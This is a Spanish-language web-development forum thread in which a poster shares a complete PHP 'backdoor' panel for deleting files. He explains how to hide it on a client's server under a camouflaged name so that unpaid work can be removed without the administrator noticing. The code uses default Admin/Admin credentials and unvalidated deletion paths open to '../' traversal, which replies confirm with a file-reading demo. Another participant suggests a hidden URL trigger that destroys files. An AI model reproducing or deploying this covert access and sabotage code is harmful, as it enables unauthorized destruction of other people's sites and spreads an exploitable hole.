Aporte: Script para controlar tu sitio sin ftp

NSD · #1 (**permalink**) 14/11/2012, 09:49

Buenas gente del foro, me han consultado recientemente sobre un caso particular, que pasa si, por ejemplo, le diseñamos la estetica a una web la subimos por ftp para que la usen los desarrolladores que nos contratan y estos no nos pagan, es mas, eliminan nuestra cuenta ftp.

Nos estarian estafando, claro esta. y que podemos hacer? como borrar nuestros archivos del server si no tenemos acceso al ftp? las herramientas de hacking son casi inutiles ante los ultimos protocolos de seguridad de los server y ademas no apoyo esta alternativa.

El scrip que aporto a continuacion es un backdoor.
Como veran en el codigo no es un virus, ni un hack, ni nada de eso, por lo que no creo estar rompiendo ninguna norma del foro al publicarlo, (ademas de que es escrito por mi)

Este script debe ser subido al server a una carpeta donde dificilmente sea rastreado, por ejemplo:

Public-Html/Sistema/Archivos/Postales/Formularios/Plugins/Validadores/Worpress/Articles/......

es decir a una carpeta que el administrador no valla a mirar con frecuencia, preferiblemente que tenga muchos archivos php, y le ponemos un nombre tipo form_validator.php u otro que se camufle entre los ya existentes.

de esta manera si no recibimos lo que pedimos a cambio por nuestro trabajo podremos eliminar del server nuestros archivos sin ser notados por el admin (o por lo menos esa es la idea).

tambien puede usarse este script para montar un panel de control (originalmente eso era con algunas funciones que quite porque para esto es innesesario)

Codigo:

Código PHP:

Ver original<?php
Error_Reporting(0);
Session_Start();
//Configuracion:
$DAT[USR] = 'Admin'; //Usuario
$DAT[CLV] = 'Admin'; //Clave
$DAT[TRO] = 'Backdoor.php'; //Nombre de este archivo
$DAT[RUT] = './'; //Ruta relativa al archivo del directorio padre que sequiere controlar
 
 
//Desloguearse.
If ($_GET['EXT']=='1') {
    Unset($_SESSION['Clave']);
    Session_Destroy();
}
 
//Cabeza de la pagina.
Echo <<<HTML
            <Html>
                <Head>
                    <Meta Charset="Utf-8" />
                    <Title>Panel de Control</Title>
                    <Style>
                        body{ 
                            background-image:-webkit-linear-gradient(top,#F9F9F9,#E9E9E9);
                        }
                        #Contenido , #Botonera , #Log {
                            width:900px;
                            border:3px double #666;
                            padding:10px;
                            color:#222;
                            font-family:arial;
                            font-size:12px;
                            font-variant:small-caps;
                            font-weight:bold;
                            margin:10px auto;
                            box-shadow:rgba(0,0,0,0.498039) 0 1px 3px,rgba(255,255,255,0.701961) 0 0 1px inset;
                            background-image:-webkit-gradient(linear,0 0%,0 100%,from(#0E4168),color-stop(0.1,#236BA3),color-stop(0.5,#236BA3),color-stop(0.9,#236BA3),to(#0E4168));
                            min-height:40px;
                            border-radius:5px;
                            text-align:center;
                        }
                        form td , form table {
                            border:1px solid #666;
                            padding:10px;
                            color:#222;
                            font-family:arial;
                            font-size:15px;
                            font-variant:small-caps;
                            font-weight:bold;
                            margin:10px auto;
                            box-shadow:rgba(0,0,0,0.498039) 0 1px 3px,rgba(255,255,255,0.701961) 0 0 1px inset;
                            background-image:-webkit-linear-gradient(top,#FEFEFE,#EDEDED);
                            border-radius:3px
                        }
                        form table{
                            width:875px;
                            margin:5px auto;
                            border-radius:6px
                        }
                        th {
                            border:1px solid #666;
                            padding:10px;
                            color:#EEE;
                            font-family:arial;
                            font-size:20px;
                            font-variant:small-caps;
                            font-weight:bold;
                            margin:10px auto;
                            box-shadow:rgba(0,0,0,0.498039) 0 1px 3px,rgba(255,255,255,0.701961) 0 0 1px inset;
                            background-image:-webkit-linear-gradient(top,#555,#111);
                            border-radius:3px;
                            Text-Align:Center;
                        }
                        .Directorio{
                            background-image:-webkit-linear-gradient(top,#CCC,#AAA);
                            Text-Align:Center;
                        }
                        input[type=button] , input[type=submit] , .Button { 
                            background-image:-webkit-gradient(linear,0 0%,0 100%,from(#FFF),color-stop(0.25,#EBEBEB),color-stop(0.5,#DBDBDB),to(#B5B5B5));
                            border:1px solid #949494;
                            border-bottom-left-radius:3px;
                            border-bottom-right-radius:3px;
                            border-top-left-radius:3px;
                            border-top-right-radius:3px;
                            box-shadow:rgba(0,0,0,0.498039) 0 1px 3px,#FFF 0 0 2px inset;
                            color:#333;
                            font-family:Arial;
                            font-size:14px;
                            font-weight:bold;
                            margin:5px;
                            padding:5px 20px;
                            text-shadow:rgba(0,0,0,0.2) 0 -1px 0px,#FFF 0 1px 0;
                            font-variant:small-caps;
                        }
                        input[type=button]:hover , input[type=submit]:hover , .button:hover { 
                            box-shadow:#000 0 0 10px;
                            color:#000;
                            cursor:pointer;
                            font-weight:bold
                        }
                        input[type=button]:active , input[type=submit]:active , .button:active{ 
                            box-shadow:#EFEFEF 0 0 10px
                        }
                        #Error{
                            background-image:-webkit-gradient(linear,0 0%,0 100%,from(#EA5347),to(#D66124));
                            border:1px solid #959595;
                            border-bottom-left-radius:3px;
                            border-bottom-right-radius:3px;
                            border-top-left-radius:3px;
                            border-top-right-radius:3px;
                            box-shadow:#000 0 0 8px;
                            color:#222;
                            font-size:14px;
                            font-variant:small-caps;
                            margin:30px auto;
                            min-height:50px;
                            padding:25px 0 0 0;
                            text-align:center;
                            text-shadow:#959595 0 1px 0;
                            width:300px;
                        }
                    </Style>
                </Head>
                <Body>
HTML;
 
//Verificar autenticidad.
If ($_SESSION[Clave] != '4Quydp6aqqUbQDv2') {
    //Verificar usuario y clave.
    If( ($_POST[USR] != $DAT[USR]) Or ($_POST[CLV] != $DAT[CLV]) ){
        //Formulario de logueo.
        Echo <<<HTML
            <Div Id="Botonera">
                <Div Id="Error">Error. Debes ser usuario autorizado.</Div>
            </Div>
            <Div Id="Contenido">
                <Form Id="Formulario" Action="$DAT[TRO]" Method="post">
                    <Table>
                        <Tr>
                            <Td> Usuario: </Td> <Td> <Input Type="Text" Name="USR" Id="USR" Size="30" /> </Td>
                        </Tr
                        <Tr>
                            <Td> Clave: </Td> <Td> <Input Type="Password" Name="CLV" Id="CLV" Size="30" /> </Td>
                        </Tr>
                        <Tr>
                            <Td Colspan="2"> <Input Type="Submit" Value="Entrar!" Style="Float:Right"/> </Td>
                        </Tr>
                    </Table>
                </Form>
            </Div>
HTML;
    } Else {
        //Logueo correcto, habilitar acceso.
        $_SESSION[Clave] = '4Quydp6aqqUbQDv2';
        //Si tu server lo permite puedes reemplazar este echo por un: Header("Location: $DAT[TRO]");
        Echo <<<HTML
                    <Div Id="Botonera">
                        <A Href="$DAT[TRO]" Class="Button">Acceder!</A>
                    </Div>
HTML;
    }
} Else {
    //Estas habilitado.
    Echo <<<HTML
            <Form Id="Formulario" Action="$DAT[TRO]" Method="post">
                <Div Id="Botonera">
                    <Input Type="Submit" Value="Eliminar Seleccionados" Style="Float:Left" />
                    <A Href="$DAT[TRO]?EXT=1" Class="Button" Style="Float:Right" >Cerrar & Salir.</A>
                </Div>
                <Div Id="Log">
HTML;
    //Si tengo que eliminar elimino.
    If (Isset($_POST[Datos])) {
        ForEach ($_POST[Datos] As $ARCH) {
            If (!Unlink($ARCH)) {
                Echo ("Error borrando: $ARCH<Br />");
            } Else {
                Echo ("Archivo borrado: $ARCH<Br />");
            }
        }
    }
    Echo <<<HTML
                </Div>
                <Div Id="Contenido">
                        <Table>
                            <Tr>
                                <Th> Selec. </Th> <Th> Ruta </Th> <Th> Archivo </Th>
                            </Tr>
HTML;
    //Funcion recursiva que los muestra.
    Function ListarArchivos($RUT){
        $I=0;
        If (Is_Dir($RUT)) {
            If ($DIR = Opendir($RUT)) {
                While (($ARCH = ReadDir($DIR)) != False) {
                    If ( (Is_Dir($RUT.$ARCH)) And ($ARCH != ".") And ($ARCH != "..") ){
                        Echo '<Tr><Td Colspan="4" Class="Directorio" >'.$ARCH.'</Td>';
                        ListarArchivos($RUT.$ARCH.'/');
                    }
                    If ( (!Is_Dir($RUT.$ARCH)) And ($ARCH != ".") And ($ARCH != "..") ){
                        Echo '<Tr><Td><Input Type="Checkbox" Name="Datos[]" Value="'.$RUT.$ARCH.'"/></Td><Td>'.$RUT.'</Td><Td>'.$ARCH.'</Td>';
                    }
                }
                Closedir($DIR);
            }
        }Else {
            Echo "<Br />No es ruta valida";
        }
    }
    //Muestro archivos a partir de esta ruta.
    ListarArchivos($DAT[RUT]);
    Echo <<<HTML
                    </Table>
                </Div>
HTML;
 
    Echo <<<HTML
            </Form>
HTML;
}
//Fin de la pagina.
Echo <<<HTML
                </Body>
            </Html>
HTML;
?>

para que ande hay que asegurarse que despues de HTML; no halla espacios ni nada.

espero le sea util a alguien, y si no les sirve como medida de seguridad de su trabajo, tal vez le sirva para montar un panel de control propio o algo asi.

saludos

Triby · #2 (**permalink**) 14/11/2012, 12:03

Demoños!!!, cualquiera que obtenga acceso a ese script podrá eliminar todo el contenido del sitio!!!

Es una lástima que te haya pasado tantas veces el hecho de que no te paguen por tu trabajo, a tal grado que hayas programado este pequeño script. Pero tampoco creo que dejar un backdoor sea lo adecuado.

Ojalá agregues la opción para eliminar ese script en cuanto recibas el pago correspondiente.

Javier01 · #3 (**permalink**) 14/11/2012, 12:11

Gracias por el aporte!

Mas haya de todo, sirve para listar archivos por carpeta, y borrarlos.
De usarlo del modo que dices es recomendable al final, borrar el propio archivo (suicidarlo),
si no quieres que unas horas lleguen un par de sicarios a tu puerta

.

Saludos

NSD · #4 (**permalink**) 14/11/2012, 12:16

Cita:

Demoños!!!, cualquiera que obtenga acceso a ese script podrá eliminar todo el contenido del sitio!!!

la idea es que este bien escondico con una url bien dificil o poco comun, y ademas tiene user y pass para evitar el acceso, con un user y un pass aleatorios, la seguridad es similar a una cuenta ftp.

todo no. solo lo que al configurarlo hallamos habilitado. si habilitamos hasta el public_html, entonces si, se podra eliminar todo.

en fin, tal vez sirva para un panel de control u otra aplicacion menos drastica.

Cita:

De usarlo del modo que dices es recomendable al final, borrar el propio archivo (suicidarlo),

Cita:

Ojalá agregues la opción para eliminar ese script en cuanto recibas el pago correspondiente.

el script puede autoeliminarse. seleccioandolo de la lista a borrar, se borra a si mismo, la idea es usarlo como "Garantia" o "Ultima Opcion", no como algo comun en todas las web.

Saludos y gracias por comentar.

skiper0125 · #5 (**permalink**) 14/11/2012, 12:32

Hola que tal.

Muy buen script

independientemente de la situación o causa por la cual realizaste este script también lo podrías utilizar para depurar tu sitio no solo para cuestiones negativas sino también para otras circunstancias.

Saludos

NSD · #6 (**permalink**) 14/11/2012, 12:37

gracias skiper0125 como bien dises podría tener otras aplicaciones, y ojala alguien saque provecho de esto para hacer algo mas grande! saludos.

Triby · #7 (**permalink**) 14/11/2012, 14:23

Con el uso de ../../otra-ruta/otro-archivo es posible eliminar todo, no tienes validaciones, simplemente eliminas y ya.

stramin · #8 (**permalink**) 14/11/2012, 14:43

PUES!

a mi me parece genial este archivo, por que a mi también me ha pasado y a ustedes también les puede pasar y da mucha rabia la impotencia de no poder hacer absolutamente nada, se ríen de ti, no te pagan y nadie te devuelve el tiempo perdido y peor aún luego contratan a otro programador para continuarlo y a ese otro tampoco le pagan.

Y PASA! mejor no les cuento la experiencia...

en muchas ocasiones he pensado en hacer un script como este pero nunca me he animado a hacerlo, claro que mi idea era hacer algo así como un contador que eliminase algún archivo necesario ingresando en la url un get específico (pagina.php?doom=die)...

Así que NSD, se agradece tu aporte, y claro, una vez que el cliente haya pagado, podemos borrar el archivo

abimex · #9 (**permalink**) 14/11/2012, 19:40

deberias ponerle una contrasena global, algo como

Código PHP:

Ver original<?php
$pass = "password encriptado";
if(!isset($_COOKIE['allowed_to_destroy'])){
    // muestra algun formulario
    if($_POST['password'] && md5($_POST['password']) == $pass){
        // te permito destruir mi sistema
    }
}

NSD · #10 (**permalink**) 14/11/2012, 20:01

Cita:

Con el uso de ../../otra-ruta/otro-archivo es posible eliminar todo, no tienes validaciones, simplemente eliminas y ya.

claro pero suponte esto:
Public_Html/Programas/Css/EstiloContacto/Dinamicos/Formularios.php
si formularios.php es nuestro archivo y en $DAT[RUT] tienes "../../../" solo podras eliminar archivos de la carpeta css y sus derivados, pero no archivos de la programas o del raiz public_html, a eso me referia con lo de "lo que allamos habilitado"

Cita:

Así que NSD, se agradece tu aporte, y claro, una vez que el cliente haya pagado, podemos borrar el archivo

Esactamente stramin esa es la idea, me alegro que te sirva o pueda servir a ti tambien!

Cita:

deberias ponerle una contrasena global, algo como

abimex de hecho tiene contraseña, un script de este tipo tiene que tener una protección aparte de la ingenieria social. si te fijas uso seciones para controlar el acceso, la idea de incluir cookies no esta mal, pero en mi opinion personal lo considero inesesario. si lo deseas puedes añadirlas y usarlas junto con ellas en tu script

saludos.

Triby · #11 (**permalink**) 16/11/2012, 16:39

Era algo que ya me temía, pero, no quería quedarme con la duda, así que probé el siguiente script desde la carpeta /localhost/fdw/prueba-rutas:

Código PHP:

Ver original<?php
$ruta = '/localhost/fdw/prueba-rutas/';
$archivo = '../index.php';
 
echo htmlentities(file_get_contents("$ruta$archivo"));

Sabes lo que obtuve?... exacto, el contenido de index.php en la carpeta anterior, así que, insisto en que debes incluir validaciones o la puerta trasera se convertirá en algo muy peligroso. Si incluyo doble ../ obtendré el index.php de /localhost y de ahí puedo exlorar toda la estructura del sitio.

NSD · #12 (**permalink**) 16/11/2012, 19:48

Cita:

Sabes lo que obtuve?... exacto, el contenido de index.php en la carpeta anterior, así que, insisto en que debes incluir validaciones o la puerta trasera se convertirá en algo muy peligroso. Si incluyo doble ../ obtendré el index.php de /localhost y de ahí puedo exlorar toda la estructura del sitio.

mmm curioso, de hecho ayer pensaba en algo asi pero con la finalidad de incluir un editor simple en textarea que permita editar el contenido de los archivos php, asi, si no queremos eliminar archivos, podriamos agregarle un cartel de morosos en el index de la web (je je) pero pensaba en ese tipo de cosas, si alguien tiene acceso podria poner un codigo como el tuyo dentro de un while y descargarse todos los fuentes de la web.

con respecto a la validacion que me pides, veo el bache en el supuesto caso que un visitante con firebug, cambiara el valor de un checkbox por un el de un archivo que no corresponde, la funcion lo eliminaria sin darse cuenta del engaño.

seguire tu consejo y mas tarde publicare el BackDoor 2.0 con validaciones y algunas funciones mas, me agradaria que cuando este listo des nuevamente tu opinion critica, pera ver en que mas se puede mejorar.

saludos.

abimex · #13 (**permalink**) 16/11/2012, 19:52

Cita:

Iniciado por NSD

claro pero suponte esto:
Public_Html/Programas/Css/EstiloContacto/Dinamicos/Formularios.php
si formularios.php es nuestro archivo y en $DAT[RUT] tienes "../../../" solo podras eliminar archivos de la carpeta css y sus derivados, pero no archivos de la programas o del raiz public_html, a eso me referia con lo de "lo que allamos habilitado"

Esactamente stramin esa es la idea, me alegro que te sirva o pueda servir a ti tambien!

abimex de hecho tiene contraseña, un script de este tipo tiene que tener una protección aparte de la ingenieria social. si te fijas uso seciones para controlar el acceso, la idea de incluir cookies no esta mal, pero en mi opinion personal lo considero inesesario. si lo deseas puedes añadirlas y usarlas junto con ellas en tu script

saludos.

En mi script? yo no usaría esto ni loco; siempre uso ssh, y con todo respeto, tiene muchos fallos

NSD · #14 (**permalink**) 16/11/2012, 20:18

Cita:

En mi script? yo no usaría esto ni loco; siempre uso ssh, y con todo respeto, tiene muchos fallos

Si no quieres usarlo me parece perfecto, pero no vengas aqui a hacerte el superado o a criticar, dime concretamente que fallos tiene? triby señalo uno de seguridad y yo encontre otro.

en lugar de decir "tiene muchos fallos" "yo no usaria tu script ni loco" di cuales. señalalos. dinos que hubieras hecho tu en cambio. di que le mejorarias. porque, pero PUNTUALMENTE por que no te agrada.

si no va a aportar nada estorbas.

y con respecto a lo de tu "yo ciempre uso SSH" por si no lo leiste te cito lo que escribi en el inicio del post:

Cita:

la subimos por ftp para que la usen los desarrolladores que nos contratan y estos no nos pagan, es mas, eliminan nuestra cuenta ftp.

Nos estarian estafando, claro esta. y que podemos hacer? como borrar nuestros archivos del server si no tenemos acceso al ftp?

ni SFTP si SSH. si no tienes user ni pass habilitados. si te banearon todo, dime como usaras SSH? de hecho el protocolo se protegera de gente como tu. entonces, nesitaras un backdoor.

y si, por esas cosas, mi script no te parece util, y crees que no sirve para una m***** entonces nose que haces aqui comentando, ve a otros "post que te interesen y te sean utiles" y recuerda que estas simples lineas de codigo las estoy regalando sin pedir nada a cambio, asi que no me reclames porque no tengo porque atender tus pedidos.
en todo caso sugiere como hizo tribi que puedo hacer para mejorarlo.

abimex · #15 (**permalink**) 16/11/2012, 20:36

bueno, no quise ser grosero, al contrario aprecio este tipo de aportes y colaboro al software libre.
Los errores que encuentro son
1. Mayusculas/Minusculas
Quizas esto no presente un problema a simple vista, pero me eh topado con servidores que no es lo mismo "echo" que "Echo" o "eChO". Ten en cuenta eso, porque todas las funciones que usas estan asi.
2. $DAT[USR]
USR deberia estar encomillado si no PHP lo usa como constante la cual no esta definida
y asi errores de escritura, en seguridad pues lo que comentaron anteriormente

Y pues lo ideal es trabajar en un servidor propio y trabajar para empresas confiables.
Saludos y una disculpa por el malentendido

Triby · #16 (**permalink**) 17/11/2012, 23:23

No se requiere firebug para explotar una vulnerabilidad como esta, basta con guardar el formulario en tu PC, modificarlo a tu gusto y procesarlo.

Por cierto, nunca he usado firebug.

NSD · #17 (**permalink**) 01/09/2014, 13:59

Como al parecer este tema resulto de utilidad para varios hasta hoy en dia, muevo el script a un repositorio publico ubicado en https://github.com/Proyecto-NSD/PHP-Backdoor de esta forma futuras actualizaciones y parches estaran disponibles y actualizados para el que los requiera.

A dia de hoy, he corregido gran parte de lo mencionado en este tema, pero no ha sido testeado con la minuciosidad que corresponde, por lo que pueden surgir algunos inprevistos al implementarlo. En cualquier caso, las actualizaciones se pondran en el repositorio antes mencionado.

Saludos!

Triby · #18 (**permalink**) 01/09/2014, 16:17

Esa validación del '..' me parece bien, aunque supongo que se podría representar el punto con algún tipo de escape de caracteres; no estaría mal si agregas protección adicional como la que @GatorV sugiere en: http://www.forosdelweb.com/f18/aport...ar-xss-948577/

Está claro que es para uso personal, pero nunca está de sobra protegerte de accesos no deseados.

NSD · #19 (**permalink**) 01/09/2014, 21:10

Hola, gracias por el interes, he estado revisando el tema del xss que mencionas y, (tal vez porque no busque lo suficiente) no he encontrado una razon real para incluir una proteccion como la del aporte mencionado.

El unico "agujero" de seguridad posible, es que el usuario tenga acceso a un documento que esta "mas abajo" o "afuera" del base_path por decirlo de alguno forma, eso solo se puede lograr empleando el nombre de directorio padre generico: ".." la funcion de xss que mencionas, protege de muchos caracteres, pero el "." justamente en particular, no es uno de ellos.

Voy a investigar todos los encodes posibles que hay para ese caracter y a agregarlos a la validacion ya que es algo que no se esta teniendo en cuenta.